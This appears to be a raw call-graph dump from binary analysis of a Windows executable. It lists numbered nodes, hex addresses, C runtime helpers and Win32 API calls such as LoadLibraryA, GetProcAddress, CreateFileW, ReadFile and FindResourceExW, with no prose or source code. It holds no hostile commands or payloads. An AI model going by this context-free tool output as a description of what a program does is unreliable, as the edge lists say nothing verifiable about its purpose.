97428 603899 97428->97403 97429 6038a3 97428->97429 97430 62313d _W_store_winword 60 API calls 97429->97430 97432 6038ae 97430->97432 97433 6081a7 59 API calls 97431->97433 97432->97409 97434 6038b8 97432->97434 97436 63d48a 97433->97436 97435 62313d _W_store_winword 60 API calls 97434->97435 97438 6038c3 97435->97438 97437 603ee2 59 API calls 97436->97437 97439 63d497 97437->97439 97438->97414 97440 6038cd 97438->97440 97439->97439 97441 62313d _W_store_winword 60 API calls 97440->97441 97442 6038d8 97441->97442 97442->97431 97443 603919 97442->97443 97445 603ee2 59 API calls 97442->97445 97443->97431 97444 603926 97443->97444 97730 60942e 97444->97730 97446 6038fc 97445->97446 97449 6081a7 59 API calls 97446->97449 97451 60390a 97449->97451 97453 603ee2 59 API calls 97451->97453 97453->97443 97455 6093ea 59 API calls 97457 603961 97455->97457 97456 609040 60 API calls 97456->97457 97457->97455 97457->97456 97458 603ee2 59 API calls 97457->97458 97459 6039a7 Mailbox 97457->97459 97458->97457 97459->97324 97461 6073f2 __write_nolock 97460->97461 97462 63ee4b _memset 97461->97462 97463 60740b 97461->97463 97466 63ee67 GetOpenFileNameW 97462->97466 98545 6048ae 97463->98545 97468 63eeb6 97466->97468 97470 607d2c 59 API calls 97468->97470 97472 63eecb 97470->97472 97472->97472 97473 607429 98573 6069ca 97473->98573 97477 607da5 97476->97477 97478 607d38 __NMSG_WRITE 97476->97478 97479 607e8c 59 API calls 97477->97479 97481 607d73 97478->97481 97482 607d4e 97478->97482 97480 607d56 _memmove 97479->97480 97480->97338 97484 608189 59 API calls 97481->97484 98906 608087 59 API calls Mailbox 97482->98906 97484->97480 97486 610a9a __write_nolock 97485->97486 98907 606ee0 97486->98907 97488 610a9f 97489 603c26 97488->97489 98918 6112fe 89 API calls 97488->98918 97489->97334 97489->97342 97491 610aac 97491->97489 98919 614047 91 API calls Mailbox 97491->98919 97493 610ab5 97493->97489 97494 610ab9 GetFullPathNameW 97493->97494 97495 607d2c 59 API calls 97494->97495 97496 610ae5 97495->97496 97497 607d2c 59 API calls 97496->97497 97498 610af2 97497->97498 97499 6450d5 _wcscat 97498->97499 97500 607d2c 59 API calls 97498->97500 97500->97489 97502 603ac2 LoadImageW RegisterClassExW 97501->97502 97503 63d49c 97501->97503 98958 603041 7 API calls 97502->98958 98959 6048fe LoadImageW EnumResourceNamesW 97503->98959 97506 603b46 97508 6039e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97506->97508 97507 63d4a5 97508->97352 97510 604406 _memset 97509->97510 98960 604213 97510->98960 97521 6450ed 97520->97521 97535 610b55 97520->97535 99049 66a0b5 89 API calls 4 library calls 97521->99049 97543 610b65 Mailbox 97535->97543 99050 609fbd 60 API calls 97535->99050 99051 6568bf 341 API calls 97535->99051 97598->97334 97599->97346 97601 631b90 __write_nolock 97600->97601 97602 604871 GetModuleFileNameW 97601->97602 97603 607f41 59 API calls 97602->97603 97604 604897 97603->97604 97605 6048ae 60 API calls 97604->97605 97606 6048a1 Mailbox 97605->97606 97606->97353 97630 620ffe 97627->97630 97629 621018 97629->97376 97630->97629 97632 62101c std::exception::exception 97630->97632 97637 62594c 97630->97637 97654 6235e1 DecodePointer 97630->97654 97655 6287db RaiseException 97632->97655 97634 621046 97656 628711 58 API calls _free 97634->97656 97636 621058 97636->97376 97638 6259c7 97637->97638 97644 625958 97637->97644 97663 6235e1 DecodePointer 97638->97663 97640 6259cd 97664 628d68 58 API calls __getptd_noexit 97640->97664 97643 62598b RtlAllocateHeap 97643->97644 97653 6259bf 97643->97653 97644->97643 97646 6259b3 97644->97646 97647 625963 97644->97647 97651 6259b1 97644->97651 97660 6235e1 DecodePointer 97644->97660 97661 628d68 58 API calls __getptd_noexit 97646->97661 97647->97644 97657 62a3ab 58 API calls __NMSG_WRITE 97647->97657 97658 62a408 58 API calls 5 library calls 97647->97658 97659 6232df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97647->97659 97662 628d68 58 API calls __getptd_noexit 97651->97662 97653->97630 97654->97630 97655->97634 97656->97636 97657->97647 97658->97647 97660->97644 97661->97651 97662->97653 97663->97640 97664->97653 97666 603d50 __write_nolock 97665->97666 97667 607d2c 59 API calls 97666->97667 97672 603eb6 Mailbox 97666->97672 97669 603d82 97667->97669 97677 603db8 Mailbox 97669->97677 97791 607b52 97669->97791 97670 607b52 59 API calls 97670->97677 97671 603e89 97671->97672 97673 607f41 59 API calls 97671->97673 97672->97383 97675 603eaa 97673->97675 97674 607f41 59 API calls 97674->97677 97676 603f84 59 API calls 97675->97676 97676->97672 97677->97670 97677->97671 97677->97672 97677->97674 97794 603f84 97677->97794 97804 604d13 97679->97804 97684 604f68 LoadLibraryExW 97814 604cc8 97684->97814 97685 63dd0f 97686 604faa 84 API calls 97685->97686 97688 63dd16 97686->97688 97690 604cc8 3 API calls 97688->97690 97693 63dd1e 97690->97693 97692 604f8f 97692->97693 97694 604f9b 97692->97694 97840 60506b 97693->97840 97695 604faa 84 API calls 97694->97695 97697 6037e6 97695->97697 97697->97390 97697->97391 97700 63dd45 97848 605027 97700->97848 97702 63dd52 97704 6081b2 97703->97704 97705 603801 97703->97705 98278 6080d7 59 API calls 2 library calls 97704->98278 97707 6093ea 97705->97707 97708 620ff6 Mailbox 59 API calls 97707->97708 97709 60380d 97708->97709 97709->97404 97711 60862b 97710->97711 97713 608652 97711->97713 98279 608b13 69 API calls Mailbox 97711->98279 97713->97408 97715 603f05 97714->97715 97716 603eec 97714->97716 97718 607d2c 59 API calls 97715->97718 97717 6081a7 59 API calls 97716->97717 97719 60388b 97717->97719 97718->97719 97720 62313d 97719->97720 97721 6231be 97720->97721 97722 623149 97720->97722 98282 6231d0 60 API calls 3 library calls 97721->98282 97728 62316e 97722->97728 98280 628d68 58 API calls __getptd_noexit 97722->98280 97725 6231cb 97725->97428 97726 623155 98281 628ff6 9 API calls wcstoxq 97726->98281 97728->97428 97729 623160 97729->97428 97731 609436 97730->97731 97732 620ff6 Mailbox 59 API calls 97731->97732 97733 609444 97732->97733 97734 603936 97733->97734 98283 60935c 59 API calls Mailbox 97733->98283 97736 6091b0 97734->97736 98284 6092c0 97736->98284 97738 620ff6 Mailbox 59 API calls 97739 603944 97738->97739 97741 609040 97739->97741 97740 6091bf 97740->97738 97740->97739 97742 63f5a5 97741->97742 97743 609057 97741->97743 97742->97743 98294 608d3b 59 API calls Mailbox 97742->98294 97745 6091a0 97743->97745 97746 609158 97743->97746 97749 60915f 97743->97749 98293 609e9c 60 API calls Mailbox 97745->98293 97748 620ff6 Mailbox 59 API calls 97746->97748 97748->97749 97749->97457 97751 605045 85 API calls 97750->97751 97752 669854 97751->97752 98295 6699be 97752->98295 97755 60506b 74 API calls 97756 669881 97755->97756 97757 60506b 74 API calls 97756->97757 97758 669891 97757->97758 97759 60506b 74 API calls 97758->97759 97760 6698ac 97759->97760 97761 60506b 74 API calls 97760->97761 97762 6698c7 97761->97762 97763 605045 85 API calls 97762->97763 97764 6698de 97763->97764 97765 62594c __crtCompareStringA_stat 58 API calls 97764->97765 97766 6698e5 97765->97766 97767 62594c __crtCompareStringA_stat 58 API calls 97766->97767 97768 6698ef 97767->97768 97769 60506b 74 API calls 97768->97769 97770 669903 97769->97770 97771 669393 GetSystemTimeAsFileTime 97770->97771 97772 669916 97771->97772 97773 669940 97772->97773 97774 66992b 97772->97774 97776 669946 97773->97776 97777 6699a5 97773->97777 97775 622f95 _free 58 API calls 97774->97775 97779 669931 97775->97779 98301 668d90 97776->98301 97778 622f95 _free 58 API calls 97777->97778 97781 63d3c1 97778->97781 97782 622f95 _free 58 API calls 97779->97782 97781->97395 97785 604faa 97781->97785 97782->97781 97784 622f95 _free 58 API calls 97784->97781 97786 604fb4 97785->97786 97787 604fbb 97785->97787 97788 6255d6 __fcloseall 83 API calls 97786->97788 97789 604fca 97787->97789 97790 604fdb FreeLibrary 97787->97790 97788->97787 97789->97395 97790->97789 97800 607faf 97791->97800 97793 607b5d 97793->97669 97795 603f92 97794->97795 97799 603fb4 _memmove 97794->97799 97797 620ff6 Mailbox 59 API calls 97795->97797 97796 620ff6 Mailbox 59 API calls 97798 603fc8 97796->97798 97797->97799 97798->97677 97799->97796 97801 607fc2 97800->97801 97802 607fbf _memmove 97800->97802 97803 620ff6 Mailbox 59 API calls 97801->97803 97802->97793 97803->97802 97853 604d61 97804->97853 97807 604d61 2 API calls 97810 604d3a 97807->97810 97808 604d53 97811 62548b 97808->97811 97809 604d4a FreeLibrary 97809->97808 97810->97808 97810->97809 97857 6254a0 97811->97857 97813 604f5c 97813->97684 97813->97685 98015 604d94 97814->98015 97817 604d94 2 API calls 97820 604ced 97817->97820 97818 604d08 97821 604dd0 97818->97821 97819 604cff FreeLibrary 97819->97818 97820->97818 97820->97819 97822 620ff6 Mailbox 59 API calls 97821->97822 97823 604de5 97822->97823 98019 60538e 97823->98019 97825 604df1 _memmove 97827 604f21 97825->97827 97828 604ee9 97825->97828 97831 604e2c 97825->97831 97826 605027 69 API calls 97836 604e35 97826->97836 98033 669ba5 95 API calls 97827->98033 98022 604fe9 CreateStreamOnHGlobal 97828->98022 97831->97826 97832 60506b 74 API calls 97832->97836 97834 604ec9 97834->97692 97835 63dcd0 97837 605045 85 API calls 97835->97837 97836->97832 97836->97834 97836->97835 98028 605045 97836->98028 97838 63dce4 97837->97838 97839 60506b 74 API calls 97838->97839 97839->97834 97841 63ddf6 97840->97841 97842 60507d 97840->97842 98057 625812 97842->98057 97845 669393 98255 6691e9 97845->98255 97847 6693a9 97847->97700 97849 605036 97848->97849 97852 63ddb9 97848->97852 98260 625e90 97849->98260 97851 60503e 97851->97702 97854 604d2e 97853->97854 97855 604d6a LoadLibraryA 97853->97855 97854->97807 97854->97810 97855->97854 97856 604d7b GetProcAddress 97855->97856 97856->97854 97860 6254ac __setmbcp 97857->97860 97858 6254bf 97906 628d68 58 API calls __getptd_noexit 97858->97906 97860->97858 97862 6254f0 97860->97862 97861 6254c4 97907 628ff6 9 API calls wcstoxq 97861->97907 97876 630738 97862->97876 97865 6254f5 97866 62550b 97865->97866 97867 6254fe 97865->97867 97868 625535 97866->97868 97869 625515 97866->97869 97908 628d68 58 API calls __getptd_noexit 97867->97908 97891 630857 97868->97891 97909 628d68 58 API calls __getptd_noexit 97869->97909 97873 6254cf @_EH4_CallFilterFunc@8 __setmbcp 97873->97813 97877 630744 __setmbcp 97876->97877 97878 629e4b __lock 58 API calls 97877->97878 97879 630752 97878->97879 97880 6307cd 97879->97880 97885 629ed3 __mtinitlocknum 58 API calls 97879->97885 97889 6307c6 97879->97889 97914 626e8d 59 API calls __lock 97879->97914 97915 626ef7 LeaveCriticalSection LeaveCriticalSection _doexit 97879->97915 97916 628a5d 58 API calls 2 library calls 97880->97916 97883 630843 __setmbcp 97883->97865 97884 6307d4 97884->97889 97917 62a06b InitializeCriticalSectionAndSpinCount 97884->97917 97885->97879 97888 6307fa EnterCriticalSection 97888->97889 97911 63084e 97889->97911 97900 630877 __wopenfile 97891->97900 97892 630891 97922 628d68 58 API calls __getptd_noexit 97892->97922 97893 630a4c 97893->97892 97897 630aaf 97893->97897 97895 630896 97923 628ff6 9 API calls wcstoxq 97895->97923 97919 6387f1 97897->97919 97898 625540 97910 625562 LeaveCriticalSection LeaveCriticalSection _fseek 97898->97910 97900->97892 97900->97893 97924 623a0b 60 API calls 2 library calls 97900->97924 97902 630a45 97902->97893 97925 623a0b 60 API calls 2 library calls 97902->97925 97904 630a64 97904->97893 97926 623a0b 60 API calls 2 library calls 97904->97926 97906->97861 97907->97873 97908->97873 97909->97873 97910->97873 97918 629fb5 LeaveCriticalSection 97911->97918 97913 630855 97913->97883 97914->97879 97915->97879 97916->97884 97917->97888 97918->97913 97927 637fd5 97919->97927 97921 63880a 97921->97898 97922->97895 97923->97898 97924->97902 97925->97904 97926->97893 97928 637fe1 __setmbcp 97927->97928 97929 637ff7 97928->97929 97932 63802d 97928->97932 98012 628d68 58 API calls __getptd_noexit 97929->98012 97931 637ffc 98013 628ff6 9 API calls wcstoxq 97931->98013 97938 63809e 97932->97938 97935 638049 98014 638072 LeaveCriticalSection __unlock_fhandle 97935->98014 97937 638006 __setmbcp 97937->97921 97939 6380be 97938->97939 97940 62471a __wsopen_nolock 58 API calls 97939->97940 97943 6380da 97940->97943 97941 629006 __invoke_watson 8 API calls 97942 6387f0 97941->97942 97945 637fd5 __wsopen_helper 103 API calls 97942->97945 97944 638114 97943->97944 97951 638137 97943->97951 98011 638211 97943->98011 97946 628d34 __commit 58 API calls 97944->97946 97947 63880a 97945->97947 97948 638119 97946->97948 97947->97935 97949 628d68 wcstoxq 58 API calls 97948->97949 97950 638126 97949->97950 97953 628ff6 wcstoxq 9 API calls 97950->97953 97952 6381f5 97951->97952 97960 6381d3 97951->97960 97954 628d34 __commit 58 API calls 97952->97954 97955 638130 97953->97955 97956 6381fa 97954->97956 97955->97935 97957 628d68 wcstoxq 58 API calls 97956->97957 97958 638207 97957->97958 97959 628ff6 wcstoxq 9 API calls 97958->97959 97959->98011 97961 62d4d4 __alloc_osfhnd 61 API calls 97960->97961 97962 6382a1 97961->97962 97963 6382ab 97962->97963 97964 6382ce 97962->97964 97965 628d34 __commit 58 API calls 97963->97965 97966 637f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97964->97966 97967 6382b0 97965->97967 97974 6382f0 97966->97974 97968 628d68 wcstoxq 58 API calls 97967->97968 97971 6382ba 97968->97971 97969 63836e GetFileType 97972 6383bb 97969->97972 97973 638379 GetLastError 97969->97973 97970 63833c GetLastError 97975 628d47 __dosmaperr 58 API calls 97970->97975 97976 628d68 wcstoxq 58 API calls 97971->97976 97982 62d76a __set_osfhnd 59 API calls 97972->97982 97977 628d47 __dosmaperr 58 API calls 97973->97977 97974->97969 97974->97970 97978 637f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97974->97978 97979 638361 97975->97979 97976->97955 97980 6383a0 CloseHandle 97977->97980 97981 638331 97978->97981 97984 628d68 wcstoxq 58 API calls 97979->97984 97980->97979 97983 6383ae 97980->97983 97981->97969 97981->97970 97987 6383d9 97982->97987 97985 628d68 wcstoxq 58 API calls 97983->97985 97984->98011 97986 6383b3 97985->97986 97986->97979 97988 638594 97987->97988 97989 631b11 __lseeki64_nolock 60 API calls 97987->97989 97998 63845a 97987->97998 97990 638767 CloseHandle 97988->97990 97988->98011 97991 638443 97989->97991 97992 637f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97990->97992 97995 628d34 __commit 58 API calls 97991->97995 97991->97998 97994 63878e 97992->97994 97993 6310ab 70 API calls __read_nolock 97993->97998 97996 638796 GetLastError 97994->97996 97997 6387c2 97994->97997 97995->97998 97999 628d47 __dosmaperr 58 API calls 97996->97999 97997->98011 97998->97988 97998->97993 98000 630d2d __close_nolock 61 API calls 97998->98000 98001 63848c 97998->98001 98005 62dac6 __write 78 API calls 97998->98005 98006 638611 97998->98006 98007 631b11 60 API calls __lseeki64_nolock 97998->98007 98002 6387a2 97999->98002 98000->97998 98001->97998 98004 6399f2 __chsize_nolock 82 API calls 98001->98004 98003 62d67d __free_osfhnd 59 API calls 98002->98003 98003->97997 98004->98001 98005->97998 98008 630d2d __close_nolock 61 API calls 98006->98008 98007->97998 98009 638618 98008->98009 98010 628d68 wcstoxq 58 API calls 98009->98010 98010->98011 98011->97941 98012->97931 98013->97937 98014->97937 98016 604ce1 98015->98016 98017 604d9d LoadLibraryA 98015->98017 98016->97817 98016->97820 98017->98016 98018 604dae GetProcAddress 98017->98018 98018->98016 98020 620ff6 Mailbox 59 API calls 98019->98020 98021 6053a0 98020->98021 98021->97825 98023 605003 FindResourceExW 98022->98023 98024 605020 98022->98024 98023->98024 98025 63dd5c LoadResource 98023->98025 98024->97831 98025->98024 98026 63dd71 SizeofResource 98025->98026 98026->98024 98027 63dd85 LockResource 98026->98027 98027->98024 98029 605054 98028->98029 98030 63ddd4 98028->98030 98034 625a7d 98029->98034 98032 605062 98032->97836 98033->97831 98035 625a89 __setmbcp 98034->98035 98036 625a9b 98035->98036 98038 625ac1 98035->98038 98047 628d68 58 API calls __getptd_noexit 98036->98047 98049 626e4e 98038->98049 98039 625aa0 98048 628ff6 9 API calls wcstoxq 98039->98048 98042 625ac7 98055 6259ee 83 API calls 4 library calls 98042->98055 98044 625ad6 98056 625af8 LeaveCriticalSection LeaveCriticalSection _fseek 98044->98056 98046 625aab __setmbcp 98046->98032 98047->98039 98048->98046 98050 626e80 EnterCriticalSection 98049->98050 98051 626e5e 98049->98051 98054 626e76 98050->98054 98051->98050 98052 626e66 98051->98052 98053 629e4b __lock 58 API calls 98052->98053 98053->98054 98054->98042 98055->98044 98056->98046 98060 62582d 98057->98060 98059 60508e 98059->97845 98062 625839 __setmbcp 98060->98062 98061 625874 __setmbcp 98061->98059 98062->98061 98063 62584f _memset 98062->98063 98064 62587c 98062->98064 98087 628d68 58 API calls __getptd_noexit 98063->98087 98065 626e4e __lock_file 59 API calls 98064->98065 98067 625882 98065->98067 98073 62564d 98067->98073 98068 625869 98088 628ff6 9 API calls wcstoxq 98068->98088 98077 625668 _memset 98073->98077 98080 625683 98073->98080 98074 625673 98185 628d68 58 API calls __getptd_noexit 98074->98185 98076 625678 98186 628ff6 9 API calls wcstoxq 98076->98186 98077->98074 98077->98080 98084 6256c3 98077->98084 98089 6258b6 LeaveCriticalSection LeaveCriticalSection _fseek 98080->98089 98081 6257d4 _memset 98188 628d68 58 API calls __getptd_noexit 98081->98188 98084->98080 98084->98081 98090 624916 98084->98090 98097 6310ab 98084->98097 98165 630df7 98084->98165 98187 630f18 58 API calls 3 library calls 98084->98187 98087->98068 98088->98061 98089->98061 98091 624920 98090->98091 98092 624935 98090->98092 98189 628d68 58 API calls __getptd_noexit 98091->98189 98092->98084 98094 624925 98190 628ff6 9 API calls wcstoxq 98094->98190 98096 624930 98096->98084 98098 6310e3 98097->98098 98099 6310cc 98097->98099 98100 63181b 98098->98100 98105 63111d 98098->98105 98200 628d34 58 API calls __getptd_noexit 98099->98200 98216 628d34 58 API calls __getptd_noexit 98100->98216 98103 6310d1 98201 628d68 58 API calls __getptd_noexit 98103->98201 98107 631125 98105->98107 98114 63113c 98105->98114 98106 631820 98217 628d68 58 API calls __getptd_noexit 98106->98217 98202 628d34 58 API calls __getptd_noexit 98107->98202 98110 631131 98218 628ff6 9 API calls wcstoxq 98110->98218 98111 63112a 98203 628d68 58 API calls __getptd_noexit 98111->98203 98113 631151 98204 628d34 58 API calls __getptd_noexit 98113->98204 98114->98113 98116 63116b 98114->98116 98118 631189 98114->98118 98145 6310d8 98114->98145 98116->98113 98121 631176 98116->98121 98205 628a5d 58 API calls 2 library calls 98118->98205 98191 635ebb 98121->98191 98122 631199 98124 6311a1 98122->98124 98125 6311bc 98122->98125 98123 63128a 98126 631303 ReadFile 98123->98126 98129 6312a0 GetConsoleMode 98123->98129 98206 628d68 58 API calls __getptd_noexit 98124->98206 98208 631b11 60 API calls 3 library calls 98125->98208 98130 6317e3 GetLastError 98126->98130 98131 631325 98126->98131 98136 631300 98129->98136 98137 6312b4 98129->98137 98133 6317f0 98130->98133 98134 6312e3 98130->98134 98131->98130 98139 6312f5 98131->98139 98132 6311a6 98207 628d34 58 API calls __getptd_noexit 98132->98207 98214 628d68 58 API calls __getptd_noexit 98133->98214 98149 6312e9 98134->98149 98209 628d47 58 API calls 3 library calls 98134->98209 98136->98126 98137->98136 98140 6312ba ReadConsoleW 98137->98140 98147 6315c7 98139->98147 98148 63135a 98139->98148 98139->98149 98140->98139 98142 6312dd GetLastError 98140->98142 98141 6317f5 98215 628d34 58 API calls __getptd_noexit 98141->98215 98142->98134 98145->98084 98146 622f95 _free 58 API calls 98146->98145 98147->98149 98156 6316cd ReadFile 98147->98156 98151 631447 98148->98151 98152 6313c6 ReadFile 98148->98152 98149->98145 98149->98146 98151->98149 98154 631504 98151->98154 98155 6314f4 98151->98155 98159 6314b4 MultiByteToWideChar 98151->98159 98153 6313e7 GetLastError 98152->98153 98164 6313f1 98152->98164 98153->98164 98154->98159 98212 631b11 60 API calls 3 library calls 98154->98212 98211 628d68 58 API calls __getptd_noexit 98155->98211 98158 6316f0 GetLastError 98156->98158 98163 6316fe 98156->98163 98158->98163 98159->98142 98159->98149 98163->98147 98213 631b11 60 API calls 3 library calls 98163->98213 98164->98148 98210 631b11 60 API calls 3 library calls 98164->98210 98166 630e02 98165->98166 98170 630e17 98165->98170 98252 628d68 58 API calls __getptd_noexit 98166->98252 98168 630e07 98253 628ff6 9 API calls wcstoxq 98168->98253 98171 630e4c 98170->98171 98178 630e12 98170->98178 98254 636234 58 API calls __malloc_crt 98170->98254 98173 624916 __flush 58 API calls 98171->98173 98174 630e60 98173->98174 98219 630f97 98174->98219 98176 630e67 98177 624916 __flush 58 API calls 98176->98177 98176->98178 98179 630e8a 98177->98179 98178->98084 98179->98178 98180 624916 __flush 58 API calls 98179->98180 98181 630e96 98180->98181 98181->98178 98182 624916 __flush 58 API calls 98181->98182 98183 630ea3 98182->98183 98184 624916 __flush 58 API calls 98183->98184 98184->98178 98185->98076 98186->98080 98187->98084 98188->98076 98189->98094 98190->98096 98192 635ed3 98191->98192 98193 635ec6 98191->98193 98196 635edf 98192->98196 98197 628d68 wcstoxq 58 API calls 98192->98197 98194 628d68 wcstoxq 58 API calls 98193->98194 98195 635ecb 98194->98195 98195->98123 98196->98123 98198 635f00 98197->98198 98199 628ff6 wcstoxq 9 API calls 98198->98199 98199->98195 98200->98103 98201->98145 98202->98111 98203->98110 98204->98111 98205->98122 98206->98132 98207->98145 98208->98121 98209->98149 98210->98164 98211->98149 98212->98159 98213->98163 98214->98141 98215->98149 98216->98106 98217->98110 98218->98145 98220 630fa3 __setmbcp 98219->98220 98221 630fb0 98220->98221 98222 630fc7 98220->98222 98223 628d34 __commit 58 API calls 98221->98223 98224 63108b 98222->98224 98225 630fdb 98222->98225 98227 630fb5 98223->98227 98226 628d34 __commit 58 API calls 98224->98226 98228 631006 98225->98228 98229 630ff9 98225->98229 98230 630ffe 98226->98230 98231 628d68 wcstoxq 58 API calls 98227->98231 98233 631013 98228->98233 98234 631028 98228->98234 98232 628d34 __commit 58 API calls 98229->98232 98237 628d68 wcstoxq 58 API calls 98230->98237 98245 630fbc __setmbcp 98231->98245 98232->98230 98235 628d34 __commit 58 API calls 98233->98235 98236 62d446 ___lock_fhandle 59 API calls 98234->98236 98238 631018 98235->98238 98239 63102e 98236->98239 98240 631020 98237->98240 98241 628d68 wcstoxq 58 API calls 98238->98241 98242 631041 98239->98242 98243 631054 98239->98243 98247 628ff6 wcstoxq 9 API calls 98240->98247 98241->98240 98246 6310ab __read_nolock 70 API calls 98242->98246 98244 628d68 wcstoxq 58 API calls 98243->98244 98248 631059 98244->98248 98245->98176 98249 63104d 98246->98249 98247->98245 98250 628d34 __commit 58 API calls 98248->98250 98251 631083 __read LeaveCriticalSection 98249->98251 98250->98249 98251->98245 98252->98168 98253->98178 98254->98171 98258 62543a GetSystemTimeAsFileTime 98255->98258 98257 6691f8 98257->97847 98259 625468 __aulldiv 98258->98259 98259->98257 98261 625e9c __setmbcp 98260->98261 98262 625ec3 98261->98262 98263 625eae 98261->98263 98265 626e4e __lock_file 59 API calls 98262->98265 98274 628d68 58 API calls __getptd_noexit 98263->98274 98267 625ec9 98265->98267 98266 625eb3 98275 628ff6 9 API calls wcstoxq 98266->98275 98276 625b00 67 API calls 6 library calls 98267->98276 98270 625ebe __setmbcp 98270->97851 98271 625ed4 98277 625ef4 LeaveCriticalSection LeaveCriticalSection _fseek 98271->98277 98273 625ee6 98273->98270 98274->98266 98275->98270 98276->98271 98277->98273 98278->97705 98279->97713 98280->97726 98281->97729 98282->97725 98283->97734 98285 6092c9 Mailbox 98284->98285 98286 63f5c8 98285->98286 98291 6092d3 98285->98291 98287 620ff6 Mailbox 59 API calls 98286->98287 98288 63f5d4 98287->98288 98289 6092da 98289->97740 98291->98289 98292 609df0 59 API calls Mailbox 98291->98292 98292->98291 98293->97749 98294->97743 98298 6699d2 __tzset_nolock _wcscmp 98295->98298 98296 60506b 74 API calls 98296->98298 98297 669393 GetSystemTimeAsFileTime 98297->98298 98298->98296 98298->98297 98299 669866 98298->98299 98300 605045 85 API calls 98298->98300 98299->97755 98299->97781 98300->98298 98302 668da9 98301->98302 98303 668d9b 98301->98303 98305 668dee 98302->98305 98306 62548b 115 API calls 98302->98306 98317 668db2 98302->98317 98304 62548b 115 API calls 98303->98304 98304->98302 98332 66901b 98305->98332 98308 668dd3 98306->98308 98308->98305 98310 668ddc 98308->98310 98309 668e32 98311 668e36 98309->98311 98312 668e57 98309->98312 98314 6255d6 __fcloseall 83 API calls 98310->98314 98310->98317 98313 668e43 98311->98313 98316 6255d6 __fcloseall 83 API calls 98311->98316 98336 668c33 98312->98336 98313->98317 98319 6255d6 __fcloseall 83 API calls 98313->98319 98314->98317 98316->98313 98317->97784 98319->98317 98320 668e85 98345 668eb5 98320->98345 98321 668e65 98322 668e72 98321->98322 98324 6255d6 __fcloseall 83 API calls 98321->98324 98322->98317 98326 6255d6 __fcloseall 83 API calls 98322->98326 98324->98322 98326->98317 98329 668ea0 98329->98317 98331 6255d6 __fcloseall 83 API calls 98329->98331 98331->98317 98333 669040 98332->98333 98334 669029 __tzset_nolock _memmove 98332->98334 98335 625812 __fread_nolock 74 API calls 98333->98335 98334->98309 98335->98334 98337 62594c __crtCompareStringA_stat 58 API calls 98336->98337 98338 668c42 98337->98338 98339 62594c __crtCompareStringA_stat 58 API calls 98338->98339 98340 668c56 98339->98340 98341 62594c __crtCompareStringA_stat 58 API calls 98340->98341 98342 668c6a 98341->98342 98343 668f97 58 API calls 98342->98343 98344 668c7d 98342->98344 98343->98344 98344->98320 98344->98321 98347 668eca 98345->98347 98346 668f82 98374 6691bf 98346->98374 98347->98346 98349 668e8c 98347->98349 98350 668c8f 74 API calls 98347->98350 98378 668d2b 74 API calls 98347->98378 98379 66909c 80 API calls 98347->98379 98353 668f97 98349->98353 98350->98347 98354 668fa4 98353->98354 98358 668faa 98353->98358 98355 622f95 _free 58 API calls 98354->98355 98355->98358 98356 668fbb 98357 668e93 98356->98357 98360 622f95 _free 58 API calls 98356->98360 98357->98329 98361 6255d6 98357->98361 98358->98356 98359 622f95 _free 58 API calls 98358->98359 98359->98356 98360->98357 98362 6255e2 __setmbcp 98361->98362 98363 6255f6 98362->98363 98364 62560e 98362->98364 98461 628d68 58 API calls __getptd_noexit 98363->98461 98366 626e4e __lock_file 59 API calls 98364->98366 98370 625606 __setmbcp 98364->98370 98369 625620 98366->98369 98367 6255fb 98462 628ff6 9 API calls wcstoxq 98367->98462 98445 62556a 98369->98445 98370->98329 98375 6691dd 98374->98375 98376 6691cc 98374->98376 98375->98349 98380 624a93 98376->98380 98378->98347 98379->98347 98381 624a9f __setmbcp 98380->98381 98382 624ad5 98381->98382 98383 624abd 98381->98383 98386 624acd __setmbcp 98381->98386 98384 626e4e __lock_file 59 API calls 98382->98384 98405 628d68 58 API calls __getptd_noexit 98383->98405 98387 624adb 98384->98387 98386->98375 98393 62493a 98387->98393 98388 624ac2 98406 628ff6 9 API calls wcstoxq 98388->98406 98395 624949 98393->98395 98400 624967 98393->98400 98394 624957 98436 628d68 58 API calls __getptd_noexit 98394->98436 98395->98394 98395->98400 98403 624981 _memmove 98395->98403 98397 62495c 98437 628ff6 9 API calls wcstoxq 98397->98437 98407 624b0d LeaveCriticalSection LeaveCriticalSection _fseek 98400->98407 98402 624916 __flush 58 API calls 98402->98403 98403->98400 98403->98402 98408 62dac6 98403->98408 98438 624c6d 98403->98438 98444 62b05e 78 API calls 7 library calls 98403->98444 98405->98388 98406->98386 98407->98386 98409 62dad2 __setmbcp 98408->98409 98410 62daf6 98409->98410 98411 62dadf 98409->98411 98413 62db95 98410->98413 98415 62db0a 98410->98415 98412 628d34 __commit 58 API calls 98411->98412 98414 62dae4 98412->98414 98416 628d34 __commit 58 API calls 98413->98416 98417 628d68 wcstoxq 58 API calls 98414->98417 98418 62db32 98415->98418 98419 62db28 98415->98419 98424 62db2d 98416->98424 98433 62daeb __setmbcp 98417->98433 98420 62d446 ___lock_fhandle 59 API calls 98418->98420 98421 628d34 __commit 58 API calls 98419->98421 98422 62db38 98420->98422 98421->98424 98425 62db4b 98422->98425 98426 62db5e 98422->98426 98423 628d68 wcstoxq 58 API calls 98427 62dba1 98423->98427 98424->98423 98428 62dbb5 __write_nolock 76 API calls 98425->98428 98430 628d68 wcstoxq 58 API calls 98426->98430 98429 628ff6 wcstoxq 9 API calls 98427->98429 98431 62db57 98428->98431 98429->98433 98432 62db63 98430->98432 98435 62db8d __write LeaveCriticalSection 98431->98435 98434 628d34 __commit 58 API calls 98432->98434 98433->98403 98434->98431 98435->98433 98436->98397 98437->98400 98439 624ca4 98438->98439 98440 624c80 98438->98440 98439->98403 98440->98439 98441 624916 __flush 58 API calls 98440->98441 98442 624c9d 98441->98442 98443 62dac6 __write 78 API calls 98442->98443 98443->98439 98444->98403 98446 625579 98445->98446 98447 62558d 98445->98447 98494 628d68 58 API calls __getptd_noexit 98446->98494 98448 625589 98447->98448 98450 624c6d __flush 78 API calls 98447->98450 98463 625645 LeaveCriticalSection LeaveCriticalSection _fseek 98448->98463 98452 625599 98450->98452 98451 62557e 98495 628ff6 9 API calls wcstoxq 98451->98495 98464 630dc7 98452->98464 98456 624916 __flush 58 API calls 98457 6255a7 98456->98457 98468 630c52 98457->98468 98459 6255ad 98459->98448 98460 622f95 _free 58 API calls 98459->98460 98460->98448 98461->98367 98462->98370 98463->98370 98465 6255a1 98464->98465 98466 630dd4 98464->98466 98465->98456 98466->98465 98467 622f95 _free 58 API calls 